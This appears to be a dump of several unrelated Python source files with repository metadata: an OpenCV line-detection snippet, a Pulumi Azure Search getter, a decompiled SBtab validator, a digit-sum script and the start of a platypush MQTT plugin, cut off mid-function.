minLineLength = 50
maxLineGap = 5
    # pass these as keywords: the 5th positional argument of HoughLinesP is 'lines', not minLineLength
    lines = cv2.HoughLinesP(edges, 1, np.pi / 180, 100,
                            minLineLength=minLineLength, maxLineGap=maxLineGap)
for line in lines:
x1,y1,x2,y2 = line[0]
cv2.line(img,(x1,y1),(x2,y2),(0,255,0),1)
cv2.imshow('edges', edges)
cv2.imshow('result', img)
cv2.waitKey()
cv2.destroyAllWindows()
show_ProbabilisticHoughTransform() | UTF-8 | Python | false | false | 593 | py | 7 | ProbabilisticHoughTransform.py | 7 | 0.669477 | 0.580101 | 0 | 24 | 23.75 | 75 |
pulumi/pulumi-azure-native | 7,911,329,785,222 | b06d4d3c94ad71181c372f43a68641d996d792d5 | b049a961f100444dde14599bab06a0a4224d869b | /sdk/python/pulumi_azure_native/search/get_service.py | 284fe59973d3757b751b19d4cb1e902508fac874 | [
"BSD-3-Clause",
"Apache-2.0"
]
| permissive | https://github.com/pulumi/pulumi-azure-native | b390c88beef8381f9a71ab2bed5571e0dd848e65 | 4c499abe17ec6696ce28477dde1157372896364e | refs/heads/master | 2023-08-30T08:19:41.564780 | 2023-08-28T19:29:04 | 2023-08-28T19:29:04 | 172,386,632 | 107 | 29 | Apache-2.0 | false | 2023-09-14T13:17:00 | 2019-02-24T20:30:21 | 2023-09-11T17:08:08 | 2023-09-14T13:16:52 | 2,507,628 | 104 | 26 | 377 | Python | false | false | # coding=utf-8
# *** WARNING: this file was generated by pulumi. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import copy
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
__all__ = [
'GetServiceResult',
'AwaitableGetServiceResult',
'get_service',
'get_service_output',
]
@pulumi.output_type
class GetServiceResult:
"""
Describes an Azure Cognitive Search service and its current state.
"""
def __init__(__self__, auth_options=None, disable_local_auth=None, encryption_with_cmk=None, hosting_mode=None, id=None, identity=None, location=None, name=None, network_rule_set=None, partition_count=None, private_endpoint_connections=None, provisioning_state=None, public_network_access=None, replica_count=None, shared_private_link_resources=None, sku=None, status=None, status_details=None, tags=None, type=None):
if auth_options and not isinstance(auth_options, dict):
raise TypeError("Expected argument 'auth_options' to be a dict")
pulumi.set(__self__, "auth_options", auth_options)
if disable_local_auth and not isinstance(disable_local_auth, bool):
raise TypeError("Expected argument 'disable_local_auth' to be a bool")
pulumi.set(__self__, "disable_local_auth", disable_local_auth)
if encryption_with_cmk and not isinstance(encryption_with_cmk, dict):
raise TypeError("Expected argument 'encryption_with_cmk' to be a dict")
pulumi.set(__self__, "encryption_with_cmk", encryption_with_cmk)
if hosting_mode and not isinstance(hosting_mode, str):
raise TypeError("Expected argument 'hosting_mode' to be a str")
pulumi.set(__self__, "hosting_mode", hosting_mode)
if id and not isinstance(id, str):
raise TypeError("Expected argument 'id' to be a str")
pulumi.set(__self__, "id", id)
if identity and not isinstance(identity, dict):
raise TypeError("Expected argument 'identity' to be a dict")
pulumi.set(__self__, "identity", identity)
if location and not isinstance(location, str):
raise TypeError("Expected argument 'location' to be a str")
pulumi.set(__self__, "location", location)
if name and not isinstance(name, str):
raise TypeError("Expected argument 'name' to be a str")
pulumi.set(__self__, "name", name)
if network_rule_set and not isinstance(network_rule_set, dict):
raise TypeError("Expected argument 'network_rule_set' to be a dict")
pulumi.set(__self__, "network_rule_set", network_rule_set)
if partition_count and not isinstance(partition_count, int):
raise TypeError("Expected argument 'partition_count' to be a int")
pulumi.set(__self__, "partition_count", partition_count)
if private_endpoint_connections and not isinstance(private_endpoint_connections, list):
raise TypeError("Expected argument 'private_endpoint_connections' to be a list")
pulumi.set(__self__, "private_endpoint_connections", private_endpoint_connections)
if provisioning_state and not isinstance(provisioning_state, str):
raise TypeError("Expected argument 'provisioning_state' to be a str")
pulumi.set(__self__, "provisioning_state", provisioning_state)
if public_network_access and not isinstance(public_network_access, str):
raise TypeError("Expected argument 'public_network_access' to be a str")
pulumi.set(__self__, "public_network_access", public_network_access)
if replica_count and not isinstance(replica_count, int):
raise TypeError("Expected argument 'replica_count' to be a int")
pulumi.set(__self__, "replica_count", replica_count)
if shared_private_link_resources and not isinstance(shared_private_link_resources, list):
raise TypeError("Expected argument 'shared_private_link_resources' to be a list")
pulumi.set(__self__, "shared_private_link_resources", shared_private_link_resources)
if sku and not isinstance(sku, dict):
raise TypeError("Expected argument 'sku' to be a dict")
pulumi.set(__self__, "sku", sku)
if status and not isinstance(status, str):
raise TypeError("Expected argument 'status' to be a str")
pulumi.set(__self__, "status", status)
if status_details and not isinstance(status_details, str):
raise TypeError("Expected argument 'status_details' to be a str")
pulumi.set(__self__, "status_details", status_details)
if tags and not isinstance(tags, dict):
raise TypeError("Expected argument 'tags' to be a dict")
pulumi.set(__self__, "tags", tags)
if type and not isinstance(type, str):
raise TypeError("Expected argument 'type' to be a str")
pulumi.set(__self__, "type", type)
@property
@pulumi.getter(name="authOptions")
def auth_options(self) -> Optional['outputs.DataPlaneAuthOptionsResponse']:
"""
Defines the options for how the data plane API of a search service authenticates requests. This cannot be set if 'disableLocalAuth' is set to true.
"""
return pulumi.get(self, "auth_options")
@property
@pulumi.getter(name="disableLocalAuth")
def disable_local_auth(self) -> Optional[bool]:
"""
When set to true, calls to the search service will not be permitted to utilize API keys for authentication. This cannot be set to true if 'dataPlaneAuthOptions' are defined.
"""
return pulumi.get(self, "disable_local_auth")
@property
@pulumi.getter(name="encryptionWithCmk")
def encryption_with_cmk(self) -> Optional['outputs.EncryptionWithCmkResponse']:
"""
Specifies any policy regarding encryption of resources (such as indexes) using customer manager keys within a search service.
"""
return pulumi.get(self, "encryption_with_cmk")
@property
@pulumi.getter(name="hostingMode")
def hosting_mode(self) -> Optional[str]:
"""
Applicable only for the standard3 SKU. You can set this property to enable up to 3 high density partitions that allow up to 1000 indexes, which is much higher than the maximum indexes allowed for any other SKU. For the standard3 SKU, the value is either 'default' or 'highDensity'. For all other SKUs, this value must be 'default'.
"""
return pulumi.get(self, "hosting_mode")
@property
@pulumi.getter
def id(self) -> str:
"""
Fully qualified resource ID for the resource. Ex - /subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}
"""
return pulumi.get(self, "id")
@property
@pulumi.getter
def identity(self) -> Optional['outputs.IdentityResponse']:
"""
The identity of the resource.
"""
return pulumi.get(self, "identity")
@property
@pulumi.getter
def location(self) -> str:
"""
The geo-location where the resource lives
"""
return pulumi.get(self, "location")
@property
@pulumi.getter
def name(self) -> str:
"""
The name of the resource
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="networkRuleSet")
def network_rule_set(self) -> Optional['outputs.NetworkRuleSetResponse']:
"""
Network specific rules that determine how the Azure Cognitive Search service may be reached.
"""
return pulumi.get(self, "network_rule_set")
@property
@pulumi.getter(name="partitionCount")
def partition_count(self) -> Optional[int]:
"""
The number of partitions in the search service; if specified, it can be 1, 2, 3, 4, 6, or 12. Values greater than 1 are only valid for standard SKUs. For 'standard3' services with hostingMode set to 'highDensity', the allowed values are between 1 and 3.
"""
return pulumi.get(self, "partition_count")
@property
@pulumi.getter(name="privateEndpointConnections")
def private_endpoint_connections(self) -> Sequence['outputs.PrivateEndpointConnectionResponse']:
"""
The list of private endpoint connections to the Azure Cognitive Search service.
"""
return pulumi.get(self, "private_endpoint_connections")
@property
@pulumi.getter(name="provisioningState")
def provisioning_state(self) -> str:
"""
The state of the last provisioning operation performed on the search service. Provisioning is an intermediate state that occurs while service capacity is being established. After capacity is set up, provisioningState changes to either 'succeeded' or 'failed'. Client applications can poll provisioning status (the recommended polling interval is from 30 seconds to one minute) by using the Get Search Service operation to see when an operation is completed. If you are using the free service, this value tends to come back as 'succeeded' directly in the call to Create search service. This is because the free service uses capacity that is already set up.
"""
return pulumi.get(self, "provisioning_state")
@property
@pulumi.getter(name="publicNetworkAccess")
def public_network_access(self) -> Optional[str]:
"""
This value can be set to 'enabled' to avoid breaking changes on existing customer resources and templates. If set to 'disabled', traffic over public interface is not allowed, and private endpoint connections would be the exclusive access method.
"""
return pulumi.get(self, "public_network_access")
@property
@pulumi.getter(name="replicaCount")
def replica_count(self) -> Optional[int]:
"""
The number of replicas in the search service. If specified, it must be a value between 1 and 12 inclusive for standard SKUs or between 1 and 3 inclusive for basic SKU.
"""
return pulumi.get(self, "replica_count")
@property
@pulumi.getter(name="sharedPrivateLinkResources")
def shared_private_link_resources(self) -> Sequence['outputs.SharedPrivateLinkResourceResponse']:
"""
The list of shared private link resources managed by the Azure Cognitive Search service.
"""
return pulumi.get(self, "shared_private_link_resources")
@property
@pulumi.getter
def sku(self) -> Optional['outputs.SkuResponse']:
"""
The SKU of the Search Service, which determines price tier and capacity limits. This property is required when creating a new Search Service.
"""
return pulumi.get(self, "sku")
@property
@pulumi.getter
def status(self) -> str:
"""
The status of the search service. Possible values include: 'running': The search service is running and no provisioning operations are underway. 'provisioning': The search service is being provisioned or scaled up or down. 'deleting': The search service is being deleted. 'degraded': The search service is degraded. This can occur when the underlying search units are not healthy. The search service is most likely operational, but performance might be slow and some requests might be dropped. 'disabled': The search service is disabled. In this state, the service will reject all API requests. 'error': The search service is in an error state. If your service is in the degraded, disabled, or error states, it means the Azure Cognitive Search team is actively investigating the underlying issue. Dedicated services in these states are still chargeable based on the number of search units provisioned.
"""
return pulumi.get(self, "status")
@property
@pulumi.getter(name="statusDetails")
def status_details(self) -> str:
"""
The details of the search service status.
"""
return pulumi.get(self, "status_details")
@property
@pulumi.getter
def tags(self) -> Optional[Mapping[str, str]]:
"""
Resource tags.
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter
def type(self) -> str:
"""
The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or "Microsoft.Storage/storageAccounts"
"""
return pulumi.get(self, "type")
class AwaitableGetServiceResult(GetServiceResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetServiceResult(
auth_options=self.auth_options,
disable_local_auth=self.disable_local_auth,
encryption_with_cmk=self.encryption_with_cmk,
hosting_mode=self.hosting_mode,
id=self.id,
identity=self.identity,
location=self.location,
name=self.name,
network_rule_set=self.network_rule_set,
partition_count=self.partition_count,
private_endpoint_connections=self.private_endpoint_connections,
provisioning_state=self.provisioning_state,
public_network_access=self.public_network_access,
replica_count=self.replica_count,
shared_private_link_resources=self.shared_private_link_resources,
sku=self.sku,
status=self.status,
status_details=self.status_details,
tags=self.tags,
type=self.type)
def get_service(resource_group_name: Optional[str] = None,
search_service_name: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetServiceResult:
"""
Gets the search service with the given name in the given resource group.
Azure REST API version: 2022-09-01.
:param str resource_group_name: The name of the resource group within the current subscription. You can obtain this value from the Azure Resource Manager API or the portal.
:param str search_service_name: The name of the Azure Cognitive Search service associated with the specified resource group.
"""
__args__ = dict()
__args__['resourceGroupName'] = resource_group_name
__args__['searchServiceName'] = search_service_name
opts = pulumi.InvokeOptions.merge(_utilities.get_invoke_opts_defaults(), opts)
__ret__ = pulumi.runtime.invoke('azure-native:search:getService', __args__, opts=opts, typ=GetServiceResult).value
return AwaitableGetServiceResult(
auth_options=pulumi.get(__ret__, 'auth_options'),
disable_local_auth=pulumi.get(__ret__, 'disable_local_auth'),
encryption_with_cmk=pulumi.get(__ret__, 'encryption_with_cmk'),
hosting_mode=pulumi.get(__ret__, 'hosting_mode'),
id=pulumi.get(__ret__, 'id'),
identity=pulumi.get(__ret__, 'identity'),
location=pulumi.get(__ret__, 'location'),
name=pulumi.get(__ret__, 'name'),
network_rule_set=pulumi.get(__ret__, 'network_rule_set'),
partition_count=pulumi.get(__ret__, 'partition_count'),
private_endpoint_connections=pulumi.get(__ret__, 'private_endpoint_connections'),
provisioning_state=pulumi.get(__ret__, 'provisioning_state'),
public_network_access=pulumi.get(__ret__, 'public_network_access'),
replica_count=pulumi.get(__ret__, 'replica_count'),
shared_private_link_resources=pulumi.get(__ret__, 'shared_private_link_resources'),
sku=pulumi.get(__ret__, 'sku'),
status=pulumi.get(__ret__, 'status'),
status_details=pulumi.get(__ret__, 'status_details'),
tags=pulumi.get(__ret__, 'tags'),
type=pulumi.get(__ret__, 'type'))
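
# Example (illustrative):
#   svc = get_service(resource_group_name='my-rg',
#                     search_service_name='my-search')
#   print(svc.status)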
@_utilities.lift_output_func(get_service)
def get_service_output(resource_group_name: Optional[pulumi.Input[str]] = None,
search_service_name: Optional[pulumi.Input[str]] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> pulumi.Output[GetServiceResult]:
"""
Gets the search service with the given name in the given resource group.
Azure REST API version: 2022-09-01.
:param str resource_group_name: The name of the resource group within the current subscription. You can obtain this value from the Azure Resource Manager API or the portal.
:param str search_service_name: The name of the Azure Cognitive Search service associated with the specified resource group.
"""
...
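# Example usage (a minimal sketch; the resource names below are hypothetical):
#
#     import pulumi
#
#     svc = get_service_output(resource_group_name='my-rg',
#                              search_service_name='my-search-service')
#     pulumi.export('searchStatus', svc.status)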
| UTF-8 | Python | false | false | 16,655 | py | 13,948 | get_service.py | 5,665 | 0.668388 | 0.665866 | 0 | 328 | 49.777439 | 909 |
karthikpappu/pyc_source | 11,304,353,948,664 | 095a3e6a503878f9b0205ad9aaf7032b01ed20e8 | 91fa095f423a3bf47eba7178a355aab3ca22cf7f | /pycfiles/sbtab-0.9.73.tar/validatorSBtab.cpython-35.py | 24788f1ea5ddd752cc640b91ea8cd76f5f74f60d | []
| no_license | https://github.com/karthikpappu/pyc_source | 0ff4d03e6d7f88c1aca7263cc294d3fa17145c9f | 739e7e73180f2c3da5fd25bd1304a3fecfff8d6e | refs/heads/master | 2023-02-04T11:27:19.098827 | 2020-12-27T04:51:17 | 2020-12-27T04:51:17 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # uncompyle6 version 3.7.4
# Python bytecode 3.5 (3350)
# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04)
# [GCC 8.4.0]
# Embedded file name: /home/timo/Desktop/projects/SBtab/pypi_installer/sbtab/validatorSBtab.py
# Compiled at: 2018-10-25 03:40:01
# Size of source mod 2**32: 14710 bytes
"""
SBtab Validator
===============
Python script that validates SBtab files
See specification for further information.
"""
try:
from . import SBtab
from . import misc
except:
import SBtab, misc
import re, collections, sys, os
class SBtabError(Exception):
    """
    Base class for errors in the SBtab validation class.
    """
def __init__(self, message):
self.message = message
def __str__(self):
return self.message
class ValidateTable:
    """
    Validates SBtab file and SBtab object.
    """
def __init__(self, sbtab, def_table=None):
"""
Initialises validator and starts check for file and table format.
Parameters
----------
        sbtab: SBtab object
            SBtab data file as SBtab object
def_table: SBtab object
SBtab definition table as SBtab object
"""
self.warnings = []
self.sbtab = sbtab
self.filename = sbtab.filename
self.read_definition(def_table)
self.allowed_table_types = list(set([row[2] for row in self.definitions[2:][0]]))
self.allowed_columns = {}
for table_type in self.allowed_table_types:
self.allowed_columns[table_type] = [row[0] for row in self.definitions[2:][0] if row[2] == table_type]
self.check_general_format()
self.column2format = {}
defs = self.definitions[2]
for row in defs:
if row[2] == self.sbtab.table_type:
self.column2format[row[0]] = row[3]
columns = []
for element in self.sbtab.columns:
if element == '':
pass
else:
columns.append(element)
self.sbtab.columns = columns
self.check_table_content()
def read_definition(self, def_table):
"""
read the required definition file; either it is provided by the user
or the default definition file is read in; otherwise program exit
"""
if def_table:
try:
self.sbtab_def = def_table
self.definitions = self.sbtab_def.create_list()
except:
                print('Definition file could not be loaded, so the validation could not be started. Please provide a definition file as argument.')
sys.exit()
        else:
            # no user-provided definition table: fall back to the bundled default
            try:
                path_ = os.path.join(os.path.dirname(__file__), '../definition_table/definitions.tsv')
                def_file = open(path_, 'r')
                def_table = def_file.read()
                self.sbtab_def = SBtab.SBtabTable(def_table, 'definitions.tsv')
                self.definitions = self.sbtab_def.create_list()
                def_file.close()
            except:
                print('Definition file could not be loaded, so the validation could not be started. Please provide a definition file as argument.')
                sys.exit()
def check_general_format(self):
"""
Validates format of SBtab file, checks file format and header row.
"""
header = self.sbtab.header_row
        quotes = [
         '"', '”', '‘', '’',
         '‛', '“', '‟',
         '′', '″', '‴',
         '‵', '‶', '‷']
for quote in quotes:
try:
header = header.replace(quote, "'")
except:
pass
if not header.startswith('!!'):
            self.warnings.append('Error: The header row of the table does not start with "!!SBtab". This file cannot be validated.')
if not re.search("TableType='([^']*)'", header):
            self.warnings.append('Error: The attribute TableType is not defined in the SBtab table; this file cannot be validated.')
if not re.search("TableName='([^']*)'", header):
            self.warnings.append('Warning: The (optional) attribute TableName is not defined in the SBtab table.')
for column in self.sbtab.columns:
if not column.startswith('!') and column != '':
                self.warnings.append('Warning: Column %s does not start with an exclamation mark. It will not be processed.' % column)
        if len(self.sbtab.value_rows) < 1:
            self.warnings.append('Warning: The SBtab file does not contain any data rows.')
for vr in self.sbtab.value_rows:
if len(vr) != len(self.sbtab.columns):
                self.warnings.append('Warning: The length of row %s does not correspond to the number of columns, which is %s.' % (
                 vr, len(self.sbtab.columns)))
def check_table_content(self):
"""
Validates the mandatory format of the SBtab in accordance to the
TableType attribute.
"""
if self.sbtab.table_type not in self.allowed_table_types:
self.warnings.append('Warning: The SBtab file has an invalid TableType in its header: %s. Thus, the validity of its columns cannot be checked' % self.sbtab.table_type)
return
unique = []
for row in self.sbtab.value_rows:
try:
identifier = row[self.sbtab.columns_dict['!ID']]
except:
break
if identifier not in unique:
unique.append(identifier)
else:
warning = 'Warning: There is an identifier that is not unique. Please change that: %s' % identifier
self.warnings.append(warning)
try:
int(identifier[0])
                self.warnings.append('Warning: There is an identifier that starts with a digit; this is not permitted for the SBML conversion: %s' % identifier)
except:
pass
if self.sbtab.table_type == 'Reaction' and '!ReactionFormula' not in self.sbtab.columns_dict:
ident = False
for it in self.sbtab.columns_dict:
if it.startswith('!Identifier'):
ident = True
break
if not ident:
                warning = 'Error: A Reaction SBtab needs at least a !ReactionFormula column or an !Identifier column to be characterised.'
self.warnings.append(warning)
if self.sbtab.table_type == 'Quantity' and '!Unit' not in self.sbtab.columns_dict:
warning = 'Error: A Quantity SBtab requires the column "Unit". Please add this column to the SBtab file.'
self.warnings.append(warning)
for column in self.sbtab.columns:
if column.replace('!', '') not in self.allowed_columns[self.sbtab.table_type] and 'Identifiers:' not in column and 'ID:urn.' not in column:
self.warnings.append('Warning: The SBtab file has an unknown column: %s.\nPlease use only supported column types!' % column)
for row in self.sbtab.value_rows:
if '!ID' in self.sbtab.columns_dict and (str(row[self.sbtab.columns_dict['!ID']]).startswith('+') or str(row[self.sbtab.columns_dict['!ID']]).startswith('-')):
self.warnings.append('Warning: An identifier for a data row must not begin with "+" or "-": \n%s' % row)
if '!ReactionFormula' in self.sbtab.columns_dict and '<=>' not in row[self.sbtab.columns_dict['!ReactionFormula']]:
warning = 'There is a sum formula that does not adhere to the sum formula syntax from the SBtab specification: %s' % str(row[self.sbtab.columns_dict['!ReactionFormula']])
self.warnings.append(warning)
for i, entry in enumerate(row):
if entry == '':
pass
else:
if self.sbtab.columns[i][1:].startswith('Identifier'):
req_format = 'string'
else:
try:
req_format = self.column2format[self.sbtab.columns[i][1:]]
except:
continue
if req_format == 'Boolean':
if entry != 'True' and entry != 'False' and entry != 'TRUE' and entry != 'FALSE' and entry != '0' and entry != '1':
warning = 'Warning: The column %s holds a value that does not conform with the assigned column format %s: %s' % (
self.sbtab.columns[i][1:],
req_format, entry)
self.warnings.append(warning)
elif req_format == 'float':
try:
float(entry)
except:
warning = 'Warning: The column %s holds a value that does not conform with the assigned column format %s: %s' % (
self.sbtab.columns[i][1:],
req_format, entry)
self.warnings.append(warning)
elif req_format == '{+,-,0}' and entry != '+' and entry != '-' and entry != '0':
warning = 'Warning: The column %s holds a value that does not conform with the assigned column format %s: %s' % (
self.sbtab.columns[i][1:],
req_format, entry)
self.warnings.append(warning)
for column in collections.Counter(self.sbtab.columns).items():
if column[1] > 1:
                self.warnings.append('Warning: There was a duplicate column in this SBtab file. Please remove it: %s' % str(column[0]))
def return_output(self):
"""
Returns the warnings from the validation process.
"""
return self.warnings
class ValidateDocument:
    """
    Validates SBtabDocument object
    """
def __init__(self, sbtab_doc, def_table=None):
"""
Initialises validator and starts check for file and table format.
Parameters
----------
sbtab_doc:
SBtabDocument object
"""
self.sbtab_doc = sbtab_doc
self.sbtab_def = def_table
def validate_document(self):
"""
validate SBtabDocument
"""
warnings = []
for sbtab in self.sbtab_doc.sbtabs:
warnings_s = [
'Warnings for %s:\n' % sbtab.filename]
self.vt = ValidateTable(sbtab, self.sbtab_def)
try:
warnings_s.append(self.vt.return_output())
except:
raise SBtabError('SBtab %s cannot be validated.' % sbtab.filename)
warnings.append(warnings_s)
return warnings
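# Example usage (a minimal sketch; 'model.tsv' is a hypothetical file, and
# SBtab.SBtabDocument is assumed to be the document class of the SBtab module):
#
#     doc = SBtab.SBtabDocument('model', open('model.tsv').read(), 'model.tsv')
#     print(ValidateDocument(doc).validate_document())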
if __name__ == '__main__':
try:
sys.argv[1]
except:
        print('You have not provided input arguments. Please start the script by also providing an SBtab file and the required definition file: >python validatorSBtab.py SBtab.csv definition.tsv')
sys.exit()
file_name = sys.argv[1]
sbtab_file_o = open(file_name, 'r')
sbtab_file = sbtab_file_o.read()
sbtab_file_o.close()
delimiter = misc.getDelimiter(sbtab_file)
try:
default_def = sys.argv[2]
def_file = open(default_def, 'r')
def_tab = def_file.read()
def_file.close()
except:
def_tab = None
validator_output = []
    # build an SBtab object from the raw file content, then validate it
    sbtab = SBtab.SBtabTable(sbtab_file, file_name)
    Validate_table_class = ValidateTable(sbtab, def_tab)
    validator_output.append(Validate_table_class.return_output())
warned = False
for warning in validator_output:
if warning != []:
print('WARNINGS: ', warning)
warned = True
if not warned:
        print('The SBtab file is valid.')
 | UTF-8 | Python | false | false | 12,442 | py | 114,545 | validatorSBtab.cpython-35.py | 111,506 | 0.553445 | 0.544189 | 0.001449 | 292 | 41.55137 | 229 |
enterpriseih/easyTest | 3,109,556,322,815 | 749e13db8574478b989fc76c182f9c80f6242b46 | 24c5c46f1d281fc15de7f6b72a5148ae85f89fb4 | /SRC/demo/基础实例/part23.py | b784897027abd7b3694db8a5915064205faed712 | []
| no_license | https://github.com/enterpriseih/easyTest | 22d87c7ffe40fb10a07f7c5cdd505f63dd45adc0 | 43b8d294e898f25055c78313cfece2753352c250 | refs/heads/master | 2023-08-23T22:55:14.798341 | 2020-02-11T09:13:43 | 2020-02-11T09:13:43 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # Exercise: print the following pattern (a diamond):
# *
# ***
# *****
# *******
# *****
# ***
# *
# print('%*s'%(4,'*'))
# print('%*s'%(5,'*'*3))
# print('%*s'%(6,'*'*5))
# print('%*s'%(7,'*'*7))
def printPic(maxLineNumber):
if maxLineNumber%2==0:
return
start=(maxLineNumber+1)//2
index=0
for x in range(start,maxLineNumber+1):
index += 1
print('%*s'%(x,'*'*(2*index-1)))
for x in range(maxLineNumber-1,start-1,-1):
index -= 1
print('%*s' % (x, '*' * (2 * index - 1)))
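# Worked example: printPic(7) is expected to print a diamond whose widest row
# has 7 stars:
#
#    *
#   ***
#  *****
# *******
#  *****
#   ***
#    *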
printPic(101)
 | UTF-8 | Python | false | false | 510 | py | 169 | part23.py | 160 | 0.473029 | 0.421162 | 0 | 30 | 15.1 | 44 |
shivvignesh/Twitterclone | 16,733,192,630,567 | bd9228c1430de538cedc7565bbf01415e2ab2f28 | 1f048eff65c3c50033a76ade764992ac824b78c4 | /core/admin.py | 0248b0f785bc80640ad930bd0f69317b42b5b444 | []
| no_license | https://github.com/shivvignesh/Twitterclone | 9d1a0dff77b11aefdabcddc5af3900ce9b9290b0 | 9b2d508500f189e92cdfa768d7a65e4513a6ca29 | refs/heads/master | 2020-03-29T03:08:50.620034 | 2018-10-06T12:25:12 | 2018-10-06T12:25:12 | 149,469,130 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from django.contrib import admin
from core.models import Profile
# Register your models here.
class ProfileAdmin(admin.ModelAdmin):
    list_display = ['user', 'about', 'dob']
    search_fields = ['user']  # Django's ModelAdmin option is "search_fields" (plural)
admin.site.register(Profile, ProfileAdmin)
| UTF-8 | Python | false | false | 237 | py | 20 | admin.py | 15 | 0.772152 | 0.772152 | 0 | 9 | 25.222222 | 41 |
jiaoyinyi/game_server | 17,738,214,936,575 | 3ffd68018fa254e3ceb8c32b74ec57ff7a73229c | 005b3f4538cf787bd82f043d3156e6662786fc4f | /script/xparser.py | fbb3b7980919320112b7c7a0513cf5c2fe64ac5e | [
"Apache-2.0"
]
| permissive | https://github.com/jiaoyinyi/game_server | 33b7a4fb7d52485063e2922eee8cc8195c7e1f20 | e39bf199dc478e10d88ed63be92fc00589ec4eb0 | refs/heads/master | 2020-07-03T15:50:02.081877 | 2019-10-09T13:12:07 | 2019-10-09T13:12:07 | 201,957,654 | 2 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #!/usr/bin/python
# -*- coding: utf-8 -*-
import xlrd
# Read an .xls file and extract the config: row 1 holds the (Chinese) column
# descriptions, row 2 the field names, and row 3 onwards the data.
# Input: a file name.
# Output: the parsed data as a list of dicts, i.e. [{}, ..., {}].
def get_datas(file):
table = open_file(file)
check_table(table)
return parser(table)
# Open the workbook and return its first sheet.
def open_file(file):
f = xlrd.open_workbook(file)
table = f.sheets()[0]
return table
# Verify that the sheet contains data.
def check_table(table):
if table.nrows >= 2:
return True
else:
raise Exception("rows num error")
# Parse the sheet.
def parser(table):
descs = table.row_values(0)
field_names = table.row_values(1)
total_row_num = table.nrows
datas = []
for row in range(2, total_row_num):
data = {}
values = table.row_values(row)
for field_index in range(len(field_names)):
try:
data[field_names[field_index]] = values[field_index]
except:
data[field_names[field_index]] = ""
datas.append(data)
return descs, datas
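# Example usage (a minimal sketch; 'goods.xls' is a hypothetical workbook laid
# out as described above):
#
#     descs, datas = get_datas('goods.xls')
#     for row in datas:  # each row is a dict keyed by the row-2 field names
#         print(row)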
| UTF-8 | Python | false | false | 1,153 | py | 57 | xparser.py | 4 | 0.588117 | 0.582075 | 0 | 49 | 19.265306 | 68 |
JuanesKill/Listas-Haskell | 6,511,170,436,150 | 20fca1ddf3e55fa31402c438892f1143fc7e75f1 | f42a92268d8fe503ebdceb00bd4fe0be5efb59b9 | /sumadigitospares.py | 5a1c5241f690093638fce8cb3721d76e60a6a635 | []
| no_license | https://github.com/JuanesKill/Listas-Haskell | cae0ba269534152f7b13da751ccf6d8efe9a55a8 | 95df3f3d3cca40b963d48f671a204b59160df14a | refs/heads/master | 2021-01-19T08:05:16.354312 | 2017-04-08T01:47:13 | 2017-04-08T01:47:13 | 87,599,631 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | def SumaDigitosPares(n):
    # n % 2 == 0 exactly when the last decimal digit of n is even.
    if n == 0:
        return 0
    if n % 2 == 0:
        # integer division (//) keeps the recursion on ints under Python 3
        return n % 10 + SumaDigitosPares(n // 10)
    return SumaDigitosPares(n // 10)
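# Worked example: SumaDigitosPares(2468) -> 8 + 6 + 4 + 2 = 20,
# while SumaDigitosPares(21111) -> 2 (its only even digit).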
print(SumaDigitosPares(21111))
| UTF-8 | Python | false | false | 275 | py | 3 | sumadigitospares.py | 1 | 0.447273 | 0.392727 | 0 | 12 | 21.916667 | 47 |
mrbertadams/platypush | 12,189,117,216,102 | d3b5a4581a9e35c231472cf79a1ba72fff1a22ce | 9484419e70b955a4e5e6a77b0d1ff1afadcca524 | /platypush/plugins/mqtt.py | e6a4e5cc83ddff52b6378afe35f87ee412722856 | [
"MIT"
]
| permissive | https://github.com/mrbertadams/platypush | 301638134a652fa42e0300386abe80ec140d9ebe | e880f004983810702b5732a88c2801201a818299 | refs/heads/master | 2020-12-05T13:00:34.698973 | 2020-01-06T14:24:52 | 2020-01-06T14:24:52 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import json
import os
from platypush.message import Message
from platypush.plugins import Plugin, action
class MqttPlugin(Plugin):
"""
This plugin allows you to send custom message to a message queue compatible
with the MQTT protocol, see http://mqtt.org/
"""
def __init__(self, host=None, port=1883, tls_cafile=None,
tls_certfile=None, tls_keyfile=None,
tls_version=None, tls_ciphers=None, username=None,
password=None, *args, **kwargs):
"""
        :param host: If set, MQTT messages will by default be routed to this host unless overridden in `send_message` (default: None)
:type host: str
:param port: If a default host is set, specify the listen port (default: 1883)
:type port: int
:param tls_cafile: If a default host is set and requires TLS/SSL, specify the certificate authority file (default: None)
:type tls_cafile: str
:param tls_certfile: If a default host is set and requires TLS/SSL, specify the certificate file (default: None)
:type tls_certfile: str
:param tls_keyfile: If a default host is set and requires TLS/SSL, specify the key file (default: None)
:type tls_keyfile: str
:param tls_version: If a default host is set and requires TLS/SSL, specify the minimum TLS supported version (default: None)
:type tls_version: str
:param tls_ciphers: If a default host is set and requires TLS/SSL, specify the supported ciphers (default: None)
:type tls_ciphers: str
        :param username: If a default host is set and requires user authentication, specify the username (default: None)
        :type username: str
        :param password: If a default host is set and requires user authentication, specify the password (default: None)
:type password: str
"""
super().__init__(*args, **kwargs)
self.host = host
self.port = port
self.username = username
self.password = password
self.tls_cafile = os.path.abspath(os.path.expanduser(tls_cafile)) \
if tls_cafile else None
self.tls_certfile = os.path.abspath(os.path.expanduser(tls_certfile)) \
if tls_certfile else None
self.tls_keyfile = os.path.abspath(os.path.expanduser(tls_keyfile)) \
if tls_keyfile else None
self.tls_version = tls_version
self.tls_ciphers = tls_ciphers
@action
def send_message(self, topic, msg, host=None, port=1883, tls_cafile=None,
tls_certfile=None, tls_keyfile=None,
tls_version=None, tls_ciphers=None, username=None,
